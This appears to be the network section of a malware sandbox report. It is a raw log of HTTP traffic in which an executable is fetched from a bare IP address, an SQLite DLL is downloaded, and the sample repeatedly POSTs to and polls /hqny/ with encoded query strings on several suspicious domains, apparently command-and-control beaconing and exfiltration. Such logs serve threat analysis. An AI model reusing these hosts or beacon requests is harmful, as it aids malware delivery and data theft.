Network Analysis

GET /winSpace/wininit.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: 103.57.130.167 Connection: Keep-Alive

HTTP/1.1 200 OK Date: Thu, 08 Jun 2023 08:35:42 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Wed, 07 Jun 2023 12:56:27 GMT ETag: "2ec00-5fd89a9fd9184" Accept-Ranges: bytes Content-Length: 191488 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload

POST /hqny/ HTTP/1.1 Host: www.uchbfm.cfd Connection: close Content-Length: 239 Cache-Control: no-cache Origin: http://www.uchbfm.cfd User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.uchbfm.cfd/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Date: Thu, 08 Jun 2023 08:36:09 GMT Content-Type: text/html Content-Length: 363 Connection: close Upgrade: h2 Last-Modified: Fri, 04 Jun 2021 07:12:04 GMT ETag: "1e2-5c3eb68a61900-gzip" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip

GET /hqny/?0LduG=m+ybVjvh7agWR9kwIW90wxm7xw0mVpAKZ7IrFeQzPIYANX32/SKYYL1eEsf44L+W0nPEXXXW2Q2sM9/iZhRVCXL5a7JofqeU46QhEqQ=&J-FG=X_zm5 HTTP/1.1 Host: www.uchbfm.cfd Connection: close

HTTP/1.1 404 Not Found Date: Thu, 08 Jun 2023 08:36:12 GMT Content-Type: text/html Content-Length: 482 Connection: close Upgrade: h2 Last-Modified: Fri, 04 Jun 2021 07:12:04 GMT ETag: "1e2-5c3eb68a61900" Accept-Ranges: bytes Vary: Accept-Encoding

GET /2021/sqlite-dll-win32-x86-3360000.zip HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Host: www.sqlite.org Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Date: Thu, 08 Jun 2023 08:36:13 GMT Last-Modified: Mon, 15 Nov 2021 22:45:13 GMT Cache-Control: max-age=120 ETag: "m6192e2f9s87b79" Content-type: application/zip; charset=utf-8 Content-length: 555897

POST /hqny/ HTTP/1.1 Host: www.kakekgirang5.shop Connection: close Content-Length: 3415 Cache-Control: no-cache Origin: http://www.kakekgirang5.shop User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kakekgirang5.shop/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

POST /hqny/ HTTP/1.1 Host: www.kakekgirang5.shop Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.kakekgirang5.shop User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.kakekgirang5.shop/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Thu, 08 Jun 2023 08:36:25 GMT server: LiteSpeed

GET /hqny/?0LduG=CXlbuvDGPZkDZuVIC7pN9bWZtfAlmQpQeGiqx6WAcwFRIivK0QTPVQRfBJCVm9sX5H1lJ3DwQtgXkv6CkHLTc1MyWUNY9q0X0o/sl2U=&J-FG=X_zm5 HTTP/1.1 Host: www.kakekgirang5.shop Connection: close

HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Thu, 08 Jun 2023 08:36:28 GMT server: LiteSpeed

POST /hqny/ HTTP/1.1 Host: www.montanasapphires.online Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.montanasapphires.online User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.montanasapphires.online/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /hqny/?0LduG=n1CdPpzxYwqEjsG0Qgxc3fK1e+R7zylx10dE7UARUo2qmYQZkuFozCTNAjLX4OweHcopEvO11zC7KH5OIbyIbW6BPXRJsCk2YfaTf38=&J-FG=X_zm5 HTTP/1.1 Host: www.montanasapphires.online Connection: close

HTTP/1.1 200 OK Date: Thu, 08 Jun 2023 08:36:39 GMT Server: Apache Set-Cookie: vsid=928vr43375899911816646; expires=Tue, 06-Jun-2028 08:36:39 GMT; Max-Age=157680000; path=/; domain=www.montanasapphires.online; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_lKKvRUhpW6OicrKAMeE0mhrOOEU80MwDtCXs6JOly1MkxAW/5cfigZRpVSB+frL6IEvonQbcAB2CMno0HrKfJw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close

POST /hqny/ HTTP/1.1 Host: www.luxeconcept.net Connection: close Content-Length: 3415 Cache-Control: no-cache Origin: http://www.luxeconcept.net User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.luxeconcept.net/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Thu, 08 Jun 2023 08:36:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Request-Id: 57585af1-a414-4a93-9dd9-539026cbfe62 X-Runtime: 0.037694 Content-Encoding: gzip

POST /hqny/ HTTP/1.1 Host: www.luxeconcept.net Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.luxeconcept.net User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.luxeconcept.net/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Server: nginx/1.14.2 Date: Thu, 08 Jun 2023 08:36:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Request-Id: 952d0655-e68f-469d-84d7-38e7a56fb93a X-Runtime: 0.028110 Content-Encoding: gzip

GET /hqny/?0LduG=Hsr+FS3aUC3v5cYG2kJwTz2Fiv05Ac/D2GVn4rP2+cnf/CEwXrKsow638/CQaZGhQs+ww4P4gMYs+x3Lc8BNJT7QU85Ww4GHlJMw20s=&J-FG=X_zm5 HTTP/1.1 Host: www.luxeconcept.net Connection: close

HTTP/1.1 200 OK Server: nginx/1.14.2 Date: Thu, 08 Jun 2023 08:36:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin ETag: W/"5d36b55a0c01f0d32badbdd02a9f063e" Cache-Control: max-age=0, private, must-revalidate X-Request-Id: cecf7db0-773f-462e-9485-b37a3c22aa53 X-Runtime: 0.010816

POST /hqny/ HTTP/1.1 Host: www.gardinalplace.life Connection: close Content-Length: 3415 Cache-Control: no-cache Origin: http://www.gardinalplace.life User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.gardinalplace.life/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Date: Thu, 08 Jun 2023 08:37:10 GMT Server: Apache Content-Length: 1414 Connection: close Content-Type: text/html

POST /hqny/ HTTP/1.1 Host: www.gardinalplace.life Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.gardinalplace.life User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.gardinalplace.life/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Date: Thu, 08 Jun 2023 08:37:13 GMT Server: Apache Content-Length: 1414 Connection: close Content-Type: text/html

GET /hqny/?0LduG=dCEp+0m3P0JUSbGijBo/RSr8kaN/Z3sSlC8vhR/5CqloiAn9JexI0t5iKqyAv6gMC40bfRj5WBEr7LlDi1AuUeAMNiBwlcnzOqfFvew=&J-FG=X_zm5 HTTP/1.1 Host: www.gardinalplace.life Connection: close

HTTP/1.1 404 Not Found Date: Thu, 08 Jun 2023 08:37:15 GMT Server: Apache Content-Length: 1414 Connection: close Content-Type: text/html; charset=utf-8

POST /hqny/ HTTP/1.1 Host: www.seseapk.com Connection: close Content-Length: 3415 Cache-Control: no-cache Origin: http://www.seseapk.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.seseapk.com/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

POST /hqny/ HTTP/1.1 Host: www.seseapk.com Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.seseapk.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.seseapk.com/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

GET /hqny/?0LduG=mJH9W27z8cbsc7vpY+E6DLxpKObOQHn2HvWQb9G1AeaU7CpO/W7NVY91S6OxE3LAXZsPh7Ioc7rkgvN9xJr9EVPP8ghUoovlGQYiqlI=&J-FG=X_zm5 HTTP/1.1 Host: www.seseapk.com Connection: close

HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Jun 2023 08:37:26 GMT Content-Type: text/html Content-Length: 466 Connection: close

POST /hqny/ HTTP/1.1 Host: www.69573.xyz Connection: close Content-Length: 3415 Cache-Control: no-cache Origin: http://www.69573.xyz User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.69573.xyz/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

POST /hqny/ HTTP/1.1 Host: www.69573.xyz Connection: close Content-Length: 187 Cache-Control: no-cache Origin: http://www.69573.xyz User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3) Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.69573.xyz/hqny/ Accept-Language: en-US Accept-Encoding: gzip, deflate

HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Jun 2023 08:37:34 GMT Content-Type: text/html Content-Length: 548 Connection: close

GET /hqny/?0LduG=LuFWF9Ua84RDJQoWRjdHaxOOJGr2k3CF/TnoVcaYxo8S6F7pRCZMbcZzZdCEfatU6D3gOhGC0lLUMqABcFj4if2qqDICpO2nO8eNe9I=&J-FG=X_zm5 HTTP/1.1 Host: www.69573.xyz Connection: close

HTTP/1.1 404 Not Found Server: nginx Date: Thu, 08 Jun 2023 08:37:37 GMT Content-Type: text/html Content-Length: 146 Connection: close